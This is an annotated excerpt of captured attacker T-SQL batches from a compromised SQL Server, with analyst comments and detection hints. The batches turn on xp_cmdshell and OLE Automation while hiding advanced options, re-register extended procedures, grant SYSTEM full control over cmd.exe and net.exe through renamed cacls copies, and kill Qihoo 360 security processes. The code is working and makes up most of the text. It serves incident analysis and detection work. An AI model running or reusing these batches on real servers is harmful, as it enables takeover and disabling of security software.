  -- Captured attacker batches, kept verbatim. Three batches of the same shape: show advanced
  -- options, enable one feature with RECONFIGURE WITH OVERRIDE, then set 'show advanced
  -- options' back to 0. Hiding the advanced options afterwards means a quick sp_configure
  -- listing no longer shows these settings, so audit the full configuration, not that default
  -- view. Features enabled, in order: xp_cmdshell, Ole Automation Procedures, Ad Hoc
  -- Distributed Queries.
  1180. USE master
  1181. EXEC sp_configure 'show advanced options', 1
  1182. RECONFIGURE WITH OVERRIDE
  1183. EXEC sp_configure 'xp_cmdshell', 1
  1184. RECONFIGURE WITH OVERRIDE
  1185. EXEC sp_configure 'show advanced options', 0
  1186.  
  1187. go
  1188. USE master
  1189. EXEC sp_configure 'show advanced options', 1
  1190. RECONFIGURE WITH OVERRIDE
  1191. EXEC sp_configure 'Ole Automation Procedures',1
  1192. RECONFIGURE WITH OVERRIDE
  1193. EXEC sp_configure 'show advanced options', 0
  1194.  
  1195. go
  1196. USE master
  1197. EXEC sp_configure 'show advanced options', 1
  1198. RECONFIGURE WITH OVERRIDE
  1199. EXEC sp_configure 'Ad Hoc Distributed Queries',1
  1200. RECONFIGURE WITH OVERRIDE
  1201. EXEC sp_configure 'show advanced options', 0
  1202.  
  1203. go
  -- Captured attacker batches, kept verbatim. Re-registers xp_regwrite against xpstar.dll, then
  -- sp_OACreate and sp_OAMethod against odsole70.dll (one through DBCC, one through
  -- sp_addextendedproc). Registry write access and COM object creation are the two primitives
  -- the remaining batches in this paste are built on.
  1204. EXEC sp_dropextendedproc 'Xp_regwrite'
  1205. exec sp_addextendedproc xp_regwrite,'xpstar.dll'
  1206.  
  1207. go
  1208. dbcc addextendedproc ("sp_OACreate","odsole70.dll")
  1209. exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
  1210.  
  1211.  
  1212. go
  -- Captured attacker batch, kept verbatim. Starts with the same drop-then-add of xp_cmdshell,
  -- xp_dirtree, xp_regread, xp_regwrite, sp_OACreate and sp_OAMethod seen earlier in the paste.
  1213. dbcc dropextendedproc ("xp_cmdshell");
  1214. dbcc addextendedproc ("xp_cmdshell","xplog70.dll");
  1215. dbcc dropextendedproc ("xp_dirtree");
  1216. dbcc addextendedproc ("xp_dirtree","xpstar.dll");
  1217. dbcc dropextendedproc ("xp_regread");
  1218. dbcc addextendedproc ("xp_regread","xpstar.dll");
  1219. dbcc dropextendedproc ("xp_regwrite");
  1220. dbcc addextendedproc ("xp_regwrite","xpstar.dll");
  1221. dbcc dropextendedproc ("sp_OACreate");
  1222. dbcc addextendedproc ("sp_OACreate","odsole70.dll");
  1223. dbcc dropextendedproc ("sp_OAMethod");
  1224. dbcc addextendedproc ("sp_OAMethod","odsole70.dll");
  -- Twenty-one WScript.Shell 'run' calls. Each starts a short-named program (wbem\sr, wbem\sp,
  -- ws, wbem\we, wbem\xj, drivers\vs, cs) with cacls-style arguments '/e /g system:f' against
  -- cmd.exe, net1.exe and net.exe, i.e. edit the ACL and grant SYSTEM full control.
  -- 'cs' matches the cacls.exe copy made earlier in this paste; the other names are presumably
  -- further renamed copies (not established on this page).
  -- Detection: two-letter executables under system32, system32\wbem or system32\drivers whose
  -- original file name is cacls.exe, and ACL changes on cmd.exe / net.exe / net1.exe.
  1225. declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'wbem\sr cmd.exe /e /g system:f'
  1226. declare @shell1 int exec sp_oacreate 'wscript.shell',@shell1 output exec sp_oamethod @shell1,'run',null,'wbem\sr net1.exe /e /g system:f'
  1227. declare @shell2 int exec sp_oacreate 'wscript.shell',@shell2 output exec sp_oamethod @shell2,'run',null,'wbem\sr net.exe /e /g system:f'
  1228. declare @shell3 int exec sp_oacreate 'wscript.shell',@shell3 output exec sp_oamethod @shell3,'run',null,'wbem\sp cmd.exe /e /g system:f'
  1229. declare @shell4 int exec sp_oacreate 'wscript.shell',@shell4 output exec sp_oamethod @shell4,'run',null,'wbem\sp net1.exe /e /g system:f'
  1230. declare @shell5 int exec sp_oacreate 'wscript.shell',@shell5 output exec sp_oamethod @shell5,'run',null,'wbem\sp net.exe /e /g system:f'
  1231. declare @shell6 int exec sp_oacreate 'wscript.shell',@shell6 output exec sp_oamethod @shell6,'run',null,'ws cmd.exe /e /g system:f'
  1232. declare @shell7 int exec sp_oacreate 'wscript.shell',@shell7 output exec sp_oamethod @shell7,'run',null,'ws net1.exe /e /g system:f'
  1233. declare @shell8 int exec sp_oacreate 'wscript.shell',@shell8 output exec sp_oamethod @shell8,'run',null,'ws net.exe /e /g system:f'
  1234. declare @shell9 int exec sp_oacreate 'wscript.shell',@shell9 output exec sp_oamethod @shell9,'run',null,'wbem\we cmd.exe /e /g system:f'
  1235. declare @shell10 int exec sp_oacreate 'wscript.shell',@shell10 output exec sp_oamethod @shell10,'run',null,'wbem\we net1.exe /e /g system:f'
  1236. declare @shell11 int exec sp_oacreate 'wscript.shell',@shell11 output exec sp_oamethod @shell11,'run',null,'wbem\we net.exe /e /g system:f'
  1237. declare @shell12 int exec sp_oacreate 'wscript.shell',@shell12 output exec sp_oamethod @shell12,'run',null,'wbem\xj cmd.exe /e /g system:f'
  1238. declare @shell13 int exec sp_oacreate 'wscript.shell',@shell13 output exec sp_oamethod @shell13,'run',null,'wbem\xj net1.exe /e /g system:f'
  1239. declare @shell14 int exec sp_oacreate 'wscript.shell',@shell14 output exec sp_oamethod @shell14,'run',null,'wbem\xj net.exe /e /g system:f'
  1240. declare @shell15 int exec sp_oacreate 'wscript.shell',@shell15 output exec sp_oamethod @shell15,'run',null,'drivers\vs cmd.exe /e /g system:f'
  1241. declare @shell16 int exec sp_oacreate 'wscript.shell',@shell16 output exec sp_oamethod @shell16,'run',null,'drivers\vs net1.exe /e /g system:f'
  1242. declare @shell17 int exec sp_oacreate 'wscript.shell',@shell17 output exec sp_oamethod @shell17,'run',null,'drivers\vs net.exe /e /g system:f'
  1243. declare @shell18 int exec sp_oacreate 'wscript.shell',@shell18 output exec sp_oamethod @shell18,'run',null,'cs cmd.exe /e /g system:f'
  1244. declare @shell19 int exec sp_oacreate 'wscript.shell',@shell19 output exec sp_oamethod @shell19,'run',null,'cs net1.exe /e /g system:f'
  1245. declare @shell20 int exec sp_oacreate 'wscript.shell',@shell20 output exec sp_oamethod @shell20,'run',null,'cs net.exe /e /g system:f'
  1246.  
  1247. go
  -- Captured attacker batch, kept verbatim. Uses xp_cmdshell to force-terminate (taskkill /f)
  -- a list of process images: 360safe.exe, 360sd.exe, 360rp.exe, 360rps.exe, 360tray.exe and
  -- ZhuDongFangYu. NOTE(review): these look like Qihoo 360 security-product processes -- confirm.
  -- Detection: the SQL Server service spawning cmd.exe and then taskkill against
  -- security-product images; the product's tamper protection should block or log the attempt.
  1248. exec master..xp_cmdshell 'taskkill /f /im 360safe.exe&taskkill /f /im 360sd.exe&taskkill /f /im 360rp.exe&taskkill /f /im 360rps.exe&taskkill /f /im 360tray.exe&taskkill /f /im ZhuDongFangYu&exit'